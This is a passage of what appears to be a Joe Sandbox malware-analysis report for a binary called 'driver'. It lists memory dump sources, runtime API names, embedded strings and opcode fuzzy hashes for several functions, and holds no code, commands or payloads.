                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3458911817-0
                                                                                                                                                                                                                                                • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                • Instruction ID: b4a91b8df81e8fe54c1de5d1cb109bd6afdbb190dae51a66343283e5ab6a6e99
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE516532A4A68286E754DF27E4815A96790FF48F8CF844135EA4DC7697DFBCE440A740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                • Instruction ID: ca73135a5ee42049fd0ae0ae2ebb798455ef37b71fe5550840e41bc44283277c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF114836B59B068AFB00CB61E8542B933A4FB19B58F040E35DA6D867A9DFB8D1549340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                                                                                • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                • Instruction ID: 4624c86a48313232cb82b20e832f45c0cd5b3e56fedf31ffeebb173713e5648b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52C1F472B5A28687E7248F1AE14466AB7E5F794B88F449134DF4E83785DF7DE800EB00
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                • API String ID: 0-1127688429
                                                                                                                                                                                                                                                • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                • Instruction ID: 46c6b233ea0f81aa6e0dd8900ad46233c426b50337ff9865065e912f693984d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20F1A472A5A3D58BE7998F16C088B7E3AA9FF44B48F054138DA4987793CFB8D540E740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                                                • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                • Instruction ID: 5f07aa5c68737927eda3d91292ce64ca3a23ebcca66c7efb05ba1ec5b1c56e8a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71B16973A05B898AEB15DF2AC9463683BE0F788F4CF148821DA5D837A5DF79D451E700
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                                                                                • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                • Instruction ID: 10e81f65412716c0d3343945e06081235f0dd0ae993e2b3c21ec30791fb7a4e9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAE1C732A8A6428AEB689E27C05013E3368FF45F4CF145135DE4E87696DFA9F851E708
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                • API String ID: 0-900081337
                                                                                                                                                                                                                                                • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                • Instruction ID: 89ced009f36fccd33b97581d31e259f83eaca16e77b012a8594166eb77295907
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D91B772A592C687E7A88E16C498B7E3AA9FB44758F114139DA4A867C3CF7CE540DB00
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                                                                                • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                • Instruction ID: c7594df3419321780a72f7eaf778cb4df412f548a9708b3eea15a268866b16a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC514662B1D6C58AE724CE3699007696B91E744FA8F489231CB9987AC7CFBDE4409700
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                                                                                • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                • Instruction ID: 1e46c08a905b629ead08dd0a067f721893ff7a115122237a36bb9b76c6deea0b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92A16763A4A7C54AEB21CF26A0007A97B90EB65F88F048031DE8D87786DEBDF511E310
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                                • Instruction ID: 6aec737de14f380c8336e078b9cec50b5cec6382fc510c687196ad41d672c871
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE51B011F8E74259FAAAAA2799051BA52907F85FCCF484034DE1DC7BD7EEBCF4016202
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                • Instruction ID: e2b43da1c4e33ce2db73fff8ba90b322b6d3c8da93e351f9abe412e6f5e5ddce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91B09220E47A82C2FA482B226C8221922A97F58B04F980138C11C80331DE6C20E57700
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                • Instruction ID: 23d8ab15b3f57486ed6a3cf3c63eb39372bec8fac38080aad891f664db7394e5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78D1D762A4A6428AEB688E2BC15027E23A4EB05F4CF144235CE4D877D6CFBDF845E744
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                • Instruction ID: 61134e8419d18580f608eb519f796e0bf933a6b957e187e9c113da2979cb7bd3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CC16F762281E08BD289EB29E47947A73D1F78930DB95406BEF87477C6CB3CA514EB10
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                • Instruction ID: afe170a142784a748a2a1dd021b87ca6af2308675ab4a00d215a053c83b0b71f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4B15D72E4A7858AE765CF2AC05427C3BA0EB49F4CF244136DA4E87396CFB9E441E744
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                • Instruction ID: ee511e0c381f4b1b422673b99d57c19890910a4fbc740e72c79c96508fd82674
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B81E172A5D7818AEB74CB1AA54137A7A91FB45F98F104235DBCE83B96CE7CF4009B00
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                • Instruction ID: 019c98d587440cc99bfa3956a110da962810b041cbd2a087a786187815854de8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3061D822E8E29246FF648A2AA45427D66C0AF41F68F544239D71DC76D7DEEDF840FB00
                                                                                                                                                                                                                                                Memory Dump Source
